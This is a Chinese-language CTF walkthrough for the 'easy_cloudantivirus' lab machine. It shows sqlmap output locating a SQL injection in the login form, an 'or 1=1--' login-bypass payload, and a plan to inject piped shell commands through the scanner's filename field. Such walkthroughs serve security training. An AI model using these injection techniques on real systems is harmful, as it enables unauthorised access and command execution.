靶機: easy_cloudantivirus( 二 ) _生活百科

┌──(kali?kali)-[~/workspace]└─$ sqlmap -r testsql.txt -f --level 4 --risk 3_____H_____ ___[']_____ ___ ___{1.6.10#stable}|_ -| . [(]| .'| . ||___|_[(]_|_|_|__,|_||_|V...|_|https://sqlmap.org[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting @ 15:18:43 /2022-10-23/[15:18:43] [INFO] parsing HTTP request from 'testsql.txt'[15:18:43] [INFO] testing connection to the target URL[15:18:44] [INFO] testing if the target URL content is stable[15:18:44] [INFO] target URL content is stable[15:18:44] [INFO] testing if POST parameter 'password' is dynamic[15:18:44] [WARNING] POST parameter 'password' does not appear to be dynamic[15:18:44] [WARNING] heuristic (basic) test shows that POST parameter 'password' might not be injectable[15:18:45] [INFO] testing for SQL injection on POST parameter 'password'[15:18:45] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'[15:18:46] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause'got a refresh intent (redirect like response common to login pages) to '/scan'. Do you want to apply it from now on? [Y/n] Y[15:18:53] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT)'[15:18:54] [INFO] POST parameter 'password' appears to be 'OR boolean-based blind - WHERE or HAVING clause (NOT)' injectable[15:18:55] [INFO] heuristic (extended) test shows that the back-end DBMS could be 'SQLite'it looks like the back-end DBMS is 'SQLite'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Yfor the remaining tests, do you want to include all tests for 'SQLite' extending provided level (4) value? [Y/n] Y[15:19:14] [INFO] testing 'Generic inline queries'[15:19:14] [INFO] testing 'SQLite inline queries'[15:19:14] [INFO] testing 'SQLite > 2.0 stacked queries (heavy query - comment)'[15:19:14] [INFO] testing 'SQLite > 2.0 stacked queries (heavy query)'[15:19:14] [INFO] testing 'SQLite > 2.0 AND time-based blind (heavy query)'[15:19:14] [INFO] testing 'SQLite > 2.0 OR time-based blind (heavy query)'[15:20:15] [INFO] POST parameter 'password' appears to be 'SQLite > 2.0 OR time-based blind (heavy query)' injectable[15:20:15] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'[15:20:15] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found

從中可以看出存在注入點，并且 DBMS 可能是 SQLite
并且從 [15:18:54] [INFO] POST parameter 'password' appears to be 'OR boolean-based blind - WHERE or HAVING clause (NOT)' injectable 可以看出注入類型 OR boolean-based

構造 SQL 注入語句，已知注入類型 OR boolean-based 可以嘗試比較通用的語句 " or 1=1--做為頁面 http://192.168.56.109:8080/ 中表單的 password 值進行提交表單

到目前為止，我們成功登錄 http://192.168.56.109:8080/scan 頁面，通過簡單的探索發現此頁面是這個 Web 應用的后臺管理頁面，其中存在數據提交，但通過關鍵詞 Try scanning some of these files with our scanner! 知道傳入的數據是被某種程序進行查殺，更多的是涉及 shell 中執行

<html><body><h1>Cloud Anti-Virus Scanner!</h1><h3>Try scanning some of these files with our scanner!</h3><pre>total 4756-rwxr-xr-x 1 scanner scanner 1113504 Oct 212018 bash-rwxr-xr-x 1 scanner scanner34888 Oct 212018 bzip2-rwxr-xr-x 1 scanner scanner35064 Oct 212018 cat-rw-rw-r-- 1 scanner scanner68 Oct 212018 eicar-rw-rw-r-- 1 scanner scanner5 Oct 212018 hello-rwxr-xr-x 1 scanner scanner35312 Oct 212018 netcat-rwxr-xr-x 1 scanner scanner 3633560 Oct 212018 python</pre><form action="/output" method="POST"><input type="filename" name="filename" placeholder="File Name"><input type="submit" value="https://www.huyubaike.com/biancheng/Scan!"></form></body></html>

我們可以嘗試使用 | 管道進行命令串聯，改變回返的數據內容，并夾雜我們想要的信息